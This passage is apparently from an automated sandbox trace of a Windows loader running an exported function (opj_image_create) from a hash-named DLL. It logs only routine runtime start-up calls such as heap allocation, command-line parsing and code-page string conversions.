\x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0276.930] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100) returned 0x5e1180 [0276.930] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0276.930] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x174) returned 0x5d9aa0 [0276.930] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0276.930] GetLastError () returned 0x0 [0276.930] SetLastError (dwErrCode=0x0) [0276.931] GetEnvironmentStringsW () returned 0x5e4680* [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x9cc) returned 0x5e5060 [0276.931] FreeEnvironmentStringsW (penv=0x5e4680) returned 1 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x118) returned 0x5daa10 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3e) returned 0x5dfff0 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x5c) returned 0x5d0780 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x62) returned 0x5d4c00 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x78) returned 0x5dc6f0 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x62) returned 0x5d5a40 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x28) returned 0x5db980 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x48) returned 0x5e0c70 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1a) returned 0x5db770 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3a) returned 0x5e0d60 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x62) returned 0x5d4970 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2a) returned 0x5dc770 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x5d4c70 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1c) returned 0x5db9b0 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xd2) returned 0x5d5cd0 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x7c) returned 0x5d4000 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3a) returned 0x5e0950 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x90) returned 0x5d3c20 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5db9e0 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x30) returned 0x5d49e0 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x36) returned 0x5d5ab0 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c) returned 0x5e02c0 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x52) returned 0x5d92c0 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c) returned 0x5e0180 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xd6) returned 0x5d5610 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x5d20d0 [0276.931] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1e) returned 0x5db7d0 [0276.932] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2c) returned 0x5d2110 [0276.932] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x54) returned 0x5d9620 [0276.932] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x52) returned 0x5d8fc0 [0276.932] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5db7a0 [0276.932] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x42) returned 0x5e0810 [0276.932] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2c) returned 0x5d2150 [0276.932] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x44) returned 0x5e0720 [0276.932] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5db260 [0276.932] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e5060 | out: hHeap=0x5d0000) returned 1 [0276.932] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1000) returned 0x5e4680 [0276.932] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0276.932] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0276.932] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_create" [0276.932] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_create", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x5d9770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0276.933] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") [0277.054] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0277.055] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0277.055] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0277.055] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0277.055] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0277.056] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0277.056] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0277.056] GetProcessHeap () returned 0x5d0000 [0277.056] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0277.057] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0277.057] GetLastError () returned 0x0 [0277.057] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0277.057] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0277.057] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c8) returned 0x5e5b10 [0277.057] SetLastError (dwErrCode=0x0) [0277.057] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1200) returned 0x5e5ee0 [0277.061] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0277.061] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0277.061] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0277.061] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0277.061] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_create" [0277.061] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_create" [0277.061] GetACP () returned 0x4e4 [0277.061] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x228) returned 0x5daca0 [0277.061] IsValidCodePage (CodePage=0x4e4) returned 1 [0277.061] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0277.062] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0277.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0277.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0277.062] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0277.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0277.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0277.062] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0277.062] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0277.062] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0277.062] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0277.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0277.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0277.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0277.062] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0277.063] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0277.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0277.063] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0277.063] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1000) returned 0x5e70f0 [0277.063] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0277.064] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0277.064] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0277.064] AreFileApisANSI () returned 1 [0277.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0277.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0277.064] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xca) returned 0x5d4860 [0277.064] GetEnvironmentStringsW () returned 0x5e8100* [0277.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 